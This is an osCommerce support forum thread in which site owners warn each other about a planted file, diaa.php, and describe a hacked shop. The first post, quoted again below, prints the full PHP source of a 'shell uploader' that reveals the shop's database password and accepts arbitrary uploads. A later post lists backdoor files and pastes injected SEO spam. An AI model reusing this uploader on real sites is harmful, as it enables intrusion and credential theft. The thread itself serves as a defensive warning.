Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Diaa.php


Aleister418

Recommended Posts

Beware this file..i found in my catalog root folder..here is the code..<title>Shell uploader By HalT</title>

<html>

<body>

<form enctype='multipart/form-data' action='diaa.php' method='post'>

Choose a file to upload: <input name='uploadFile' type='file' />

</select>

 

<input type='submit' value='Upload File' />

</form>

</body>

</html>

<?

$pathfile='';

 

 

include 'includes/configure.php';

mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die(mysql_error());

echo ' MySQL: ON ';

echo '<br/>';

mysql_select_db(DB_DATABASE) or die(mysql_error());

echo 'DB Connected ';

echo '<br/>';

 

 

echo 'DB server : '.DB_SERVER.' ';

echo '<br />';

 

echo 'DB user name : '.DB_SERVER_USERNAME.'' ;

echo '<br />';

 

echo 'DB Password : '.DB_SERVER_PASSWORD.'';

echo '<br />';

 

echo 'DB Name : '.DB_DATABASE.'';

echo '<br/>';

echo '<br/>';

 

move_uploaded_file($_FILES['uploadFile']['tmp_name'],'' .$_FILES['uploadFile']['name'])

?>

it might have been mentioned before but just in case everyone forgot about it....login or die is not a message i wanna see lol

Link to comment
Share on other sites

Beware this file..i found in my catalog root folder..here is the code..<title>Shell uploader By HalT</title>

<html>

<body>

<form enctype='multipart/form-data' action='diaa.php' method='post'>

Choose a file to upload: <input name='uploadFile' type='file' />

</select>

 

<input type='submit' value='Upload File' />

</form>

</body>

</html>

<?

$pathfile='';

 

 

include 'includes/configure.php';

mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die(mysql_error());

echo ' MySQL: ON ';

echo '<br/>';

mysql_select_db(DB_DATABASE) or die(mysql_error());

echo 'DB Connected ';

echo '<br/>';

 

 

echo 'DB server : '.DB_SERVER.' ';

echo '<br />';

 

echo 'DB user name : '.DB_SERVER_USERNAME.'' ;

echo '<br />';

 

echo 'DB Password : '.DB_SERVER_PASSWORD.'';

echo '<br />';

 

echo 'DB Name : '.DB_DATABASE.'';

echo '<br/>';

echo '<br/>';

 

move_uploaded_file($_FILES['uploadFile']['tmp_name'],'' .$_FILES['uploadFile']['name'])

?>

it might have been mentioned before but just in case everyone forgot about it....login or die is not a message i wanna see lol

 

 

If you have found the one you will need to check for more, as these things hardly happen solo!

look in your folder with no index like images, there may be more folders or files in there with other files.

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

If you have found the one you will need to check for more, as these things hardly happen solo!

look in your folder with no index like images, there may be more folders or files in there with other files.

Nic

 

 

will do cheers..new to oscommerce still building site and still learning..so forgive if i mention things already covered.

Link to comment
Share on other sites

this is what I found from web diretory

 

-rw------- 1 apache apache 1218890 Sep 12 17:15 ab4b4bzabbb6b1b2a6c4s6f45a858z6d6ad76a4d.zip

-rw-r--r-- 1 apache apache 66224 Jun 25 17:56 account_manage.php

-rw-r--r-- 1 apache apache 3494 Aug 30 09:46 cmd11.php

-rw-r--r-- 1 apache apache 3479 Sep 12 16:38 cmd1.php

-rw-r--r-- 1 apache devteam 343 Sep 5 01:10 cookie_usage.php

-rw------- 1 apache apache 832 Aug 30 09:46 db1.php

-rw-r--r-- 1 apache apache 915 Aug 30 09:43 diaa.php

-rwxrwxrwx 1 apache apache 189 Sep 5 01:10 goog1e2847c3396fc9a.php

-rwxrwxrwx 1 apache apache 189 Sep 5 01:10 goog1e34c4846cabc473.php

-rwxrwxrwx 1 apache apache 189 Sep 5 01:10 goog1e501b5c44a7ae53.php

-rwxrwxrwx 1 apache apache 189 Sep 5 01:10 goog1e5d991d771a9e2c.php

-rwxrwxrwx 1 apache apache 189 Jun 21 18:27 goog1e7e2cb7ab7b6b4c.php

-rwxrwxrwx 1 apache apache 675 Sep 5 01:10 goog1e_analist_501b5c44a7ae53.php

-rwxrwxrwx 1 apache apache 189 Jun 27 05:52 goog1ebfab2470b7421.php

-rwxrwxrwx 1 apache apache 4484 Jun 7 17:00 google31da0a043a3e4f.php

-rwxrwxrwx 1 apache apache 4483 Jun 11 02:13 google3a0476bb5973789.php

-rwxrwxrwx 1 apache apache 66421 Jun 13 07:41 google3a74eca97518e29.php

-rw-r--r-- 1 apache apache 66421 Jun 7 17:00 google559b7e0ec43a8576.php

-rw-r--r-- 1 apache apache 915 Sep 12 16:36 halt.php

-rw-r--r-- 1 apache apache 172 Aug 14 23:34 load.swf

-rw-r--r-- 1 apache apache 13312 Aug 14 23:34 page.php

-rw-r--r-- 1 apache apache 4769 Aug 14 23:34 player.gif

-rw------- 1 apache apache 546213 Aug 30 09:48 sw.php

 

after hacker got access, they also upload tons of files under images folder

.cch

.news

the contents relate to seo

 

this is one of file

 

<img src="http://abbamikory.blogs.com/photos/abba_photos/1976_abba_moulin_rouge_style.jpg" alt="Abba" title="Abba" /><P>Anyone looking for the key to Abba's enduring appeal should look no further than "Voulez Vous" and "Gimme! Gimme! Gimme! (A Man After Midnight)" for their . </P><P>ABBA on TV - All known TV, PROMO and film performances by the Swedish pop group ABBA and its members from all over the world.</P><P>Watch videos & listen free to ABBA: Dancing Queen, Mamma Mia & more, plus 429 pictures. ABBA was a pop music group formed in Stockholm, Sweden in November . </P><P>Unlimited free ABBA music - Click to play Dancing Queen, Mamma Mia and whatever else you want! The most commercially successful pop group of the 1970s, . </P><P>16 Dec 2009 . ABBA to Enter Rock & Roll Hall of Fame with a flourish of disco, hum-ability, and harmony.</P><img src="http://www.in-sect.com/scr/abba_now.jpg" alt="Abba" title="Abba" /><P>ABBA on yksi kaikkien aikojen suosituimmista ja tunnetuimmista yhtyeistä. Benny Anderssonin ja Björn Ulvaeuksen sävellyksistä on tullut populaarimusiikin . </P><P>The Spirit of the Lord GOD is upon me; because the LORD hath anointed me to preach good tidings unto the meek hath sent me to bind up the brokenhearted, . </P><P>Disclaimer: this page is not written by from the point of view of an ABBA fanatic and is not generally intended for narrow-perspective ABBA fanatics. . </P><P>ABOUT ABBA, |, PRODUCTS, |, HERBAL RX, |, PROFESSIONAL, |, PRESS, |, FIND A SALON · OUR PHILOSOPHY · EVOLUTION · HERBAL PRESCRIPTIONS · COMMITMENT TO PURITY . </P><P>I work all night, I work all day, to pay the bills I have to pay / Ain't it sad / And still there never seems to be a single penny left for me . </P><img src="http://www.alien-earth.org/music/images/abba.jpg" alt="Abba" title="Abba" /><P>Organized in 1924, the ABBA celebrates the American Brahman, the first beef cattle breed developed in the United States.</P><P>abba (Association of Business-to-Business Agencies) is dedicated to supporting the agencies and client marketers that work in B2B marketing and . </P><P>abba.muziek.net/ - SimilarABBA Plaza - the ultimate ABBA siteABBA fan site: ABBA news, Mamma Mia movie, ABBAWORLD exhibition, ABBA costumes, ABBA fan cds, ABBA fan dvd, ABBA lyrics, ABBA concerts, ABBA pictures, . </P><P>ABBA Dancing Queen - Lyrics, Videos, Stories, Material and Everything about The ABBA hit song Dancing Queen! The ultimate ABBA fansite!</P><P>a title of reverence for bishops and patriarchs in the Coptic, Ethiopian Christian, and Syriac churches. 2. New Testament. an Aramaic word for father, . </P><img src="http://www.abba.or.at/files/abba4ever.jpg" alt="Abba" title="Abba" /><P>ABBA or Abba is/was/has been/will be a Swedish death metal band, without the slightest pop-influence, that formed in the late 1960's by the Central . </P><P>ABBA Elite is a 4 piece tribute band with live 4 part harmonies, live guitar and keyboards with exceptional backing tracks giving an authentic sounding and . </P><P>End Times Prophecy Bible prophecy Iran,Israel,Damascus Syria,Russia,US And China. More on the possibility that Obama will get assassinated possible on . </P><P>Abba is the Aramaic word for "father." The word occurs three times in the New Testament (Mark 14:36; Romans 8:15; Galatians 4:6). . </P><P>ABBA SOS - Lyrics, Videos, Stories, Material and Everything about The ABBA hit song SOS! The ultimate ABBA fansite! All you need about ABBA SOS.</P><img src="http://www.abba-world.net/phenomenon/images/abba76.jpg" alt="Abba" title="Abba" /><P>Would you like to receive the best offers from abba Hotels without lifting a finger? . Abba Rambla Hotel. C/ Rambla del Raval, 4C Barcelona, Spain +34 . </P><P>Would you like to receive the best offers from abba Hotels without lifting a finger? . Abba Sants Hotel. C/ Numancia , 32 Barcelona, Spain +34 93 600 . </P><P>Everywhere the show has played it has been welcomed very much and it has created another ABBA fever. The audiences is going mad and are really truly . </P><P>Abba sing about their infestation of martial artists. They seem to be in good spirits about it.</P><P>Abba Eban was a member of the American Academy of Sciences. . Statement by Ambassador Abba Eban to the Security Council, 4 August 1949 . </P><img src="http://www.abba-the-ladies.de/images/abba/abba_02.jpg" alt="Abba" title="Abba" /><P>13 Jul 2009 . ABBA: Assembly Boosted By Amino acid sequences . The development of ABBA was supported by the National Institutes of Health under grants . </P><P> Rating: 6.1/10 - from 1,529 users</P><P>Official Website of bollywood movie Well Done Abba featuring BOMAN IRANI, MINISSHA LAMBA, SAMMIR DATTANI, ILA ARUN, RAJIT KAPUR, RAVI KISHEN, SONALI ULKARNI . </P><P>19 Jun 2010 . Annotated and heavily illustrated day-by-day timeline of the group's activity from 1970-1982.</P><P>Collection of thousands of ABBA and solo releases on albums, singles, cd's etc..</P><img src="http://images.fanpop.com/images/image_uploads/Abba-abba-64000_1024_768.jpg" alt="Abba" title="Abba" /><P>Information: Make sure ABBA gets as many envelopes as possible but watch out for all those nasty pests! Top Rated · Newest Games . </P><P>ABBA MANIA | The Original From London's West End, featuring a special concert presentation, which celebrates the music and style of Abba in a respectful and . </P><P>Former Israeli foreign minister. PHOTO. Article in the LookLex / Encyclopaedia.</P><P>Find your Abba pictures at Picsearch.com! We have over a billion indexed images in our directory, and it continually expands.</P><P>Official international fan club. Includes member biographies and membership information.</P><img src="http://imstars.aufeminin.com/stars/fan/abba/abba-20060902-157834.jpg" alt="Abba" title="Abba" /><P>Abba Eban was a member of the American Academy of Sciences. His books include Heritage: Civilization and the Jews, Promised Land, My Country: The Story of . </P><P>Welcome to ABBA Lyrics all the ABBA Lyrics in this site are the property of ABBA Lyrics or/and respective authors, artists and labels and provided just for . </P><P>B & B listings of the American Bed & Breakfast Association.</P><P>You are visitor number since 14.01.2002. Visitor Map · Create your own visitor map!</P><P>13 Jul 2008 . The most commercially successful pop group of the 1970s, the origins of the Swedish superstars ABBA dated back to 1966, when keyboardist and . </P><img src="http://starling.rinet.ru/music/sleeves/zap_abba.jpg" alt="Abba" title="Abba" /><P>Their music has seen a resurgence in interest in part due to the release of their multi-platinum greatest hits album "ABBA Gold" in 1992 and a general . </P><P>Preview and download songs by ABBA on iTunes. Songs by ABBA start at just $0.99 each.</P><P>19 Jun 2010 . Provides the complete list of ABBA song titles (including working titles) and more than 400 ABBA links, categorized and reviewed.</P><P>Yahoo! reviewed these sites and found them related to Disco > ABBA.</P><P>2 Feb 2000 . During the 1970s, one of the most dominating forces within the field of popular music was a group from Sweden called "ABBA", . </P><img src="http://www.edinburghweddings.com/tribute-acts/abba.jpg" alt="Abba" title="Abba" /><P>Consequently, they made a pilgrimage to ABBA headquarters in Sweden in a failed attempted to meet the super-group and persuade them to allow them to release . </P><P>Abba Seafood - bästa platsen för fisk och skaldjur - Kalles kaviar Sill Ansjovis Matssill Fiskbullar Stuvningar och Recept. Matupplevelser frÃ¥n havet och . </P><P>ABBAsite.com â The Official ABBA Site with News, Music, Pictures, Store and much more!</P><P>ABBA was a Swedish pop music groupformed in Stockholm in 1972, consisting of Anni-Frid "Frida" Lyngstad, Björn Ulvaeus, Benny Andersson and Agnetha . </P><P>15 Dec 2009 . The Stooges, ABBA, Jimmy Cliff, Genesis, and the Hollies ake up the 2010 class of the Rock and Roll Hall . </P>

Link to comment
Share on other sites

  • 1 month later...

@slee1005

 

You're a victim of this hack

 

@witer

 

Visit the link below:

 

How to Secure Your Site

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...